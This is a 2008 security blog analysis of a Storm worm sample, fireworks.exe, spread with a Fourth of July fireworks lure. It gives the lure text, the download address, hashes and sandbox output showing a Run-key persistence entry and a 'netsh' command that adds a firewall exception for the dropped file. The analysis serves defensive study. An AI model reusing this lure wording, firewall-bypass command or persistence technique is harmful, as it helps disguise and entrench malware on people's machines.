HolisticInfoSec.org
July 3, 2008
Russ McRee
holisticinfosec at gmail.com

STORM SAMPLE: FIREWORKS.EXE

Sample source: http://66.31.118.34/
Source web page: Colorful Independence Day Fireworks
Colorful Independence Day events have already started throughout the country. The largest firework happens on the last weekday before the Fourth of July. Unprecedented sum of money was spent on this fabulous show. If you want to see the best Independence Day firework just click on the video and run it.
Sample details:
File: fireworks.exe
MD5: d7d350e34809adc4a56e592b58f9d4ad
Size: 118785
---------------------------------------------------------------------------
VirusTotal: http://www.virustotal.com/analisis/a9d59c2e1f3393fa8f7373d32e327dea
---------------------------------------------------------------------------
Sandbox analysis

Files

New Files
C:\WINDOWS\msserv.exe
C:\WINDOWS\msserv.config

Opened Files
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\msserv.exe
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\netsh.exe
C:\WINDOWS\system32\w32tm.exe
\\.\PIPE\lsarpc
C:\WINDOWS\Registration\R00000000000b.clb
\\.\PIPE\lsarpc
C:\WINDOWS\msserv.exe

Deleted Files

Chronological Order
Copy File: c:\malware\fireworks.exe to C:\WINDOWS\msserv.exe
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\msserv.exe ()
Find File: msserv.exe
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\netsh.exe ()
Find File: netsh.exe
Open File: C:\WINDOWS\system32\w32tm.exe ()
Find File: w32tm.exe
Get File Attributes: C:\WINDOWS\msserv.config Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\msserv.config
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R00000000000b.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\msserv.exe (OPEN_EXISTING)

Registry

Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "" = C:\WINDOWS\msserv.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "" = C:\WINDOWS\msserv.exe:*:Enabled:enable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Parameters "" = time.windows.com,time.nist.gov
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Parameters "" = NTP

Reads
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter ""
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared ""
HKEY_CURRENT_USER\Keyboard Layout\Toggle ""
HKEY_CURRENT_USER\Keyboard Layout\Toggle ""
HKEY_CURRENT_USER\Keyboard Layout\Toggle ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService ""
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List ""

Processes

Process Management
Creates Process - Filename () CommandLine: (netsh firewall set allowedprogram "C:\WINDOWS\msserv.exe" enable) As User: () Creation Flags: ()
Creates Process - Filename () CommandLine: (w32tm /config /syncfromflags:manual /manualpeerlist:time.windows.com,time.nist.gov) As User: () Creation Flags: ()
Creates Process - Filename () CommandLine: (w32tm /config /update) As User: () Creation Flags: ()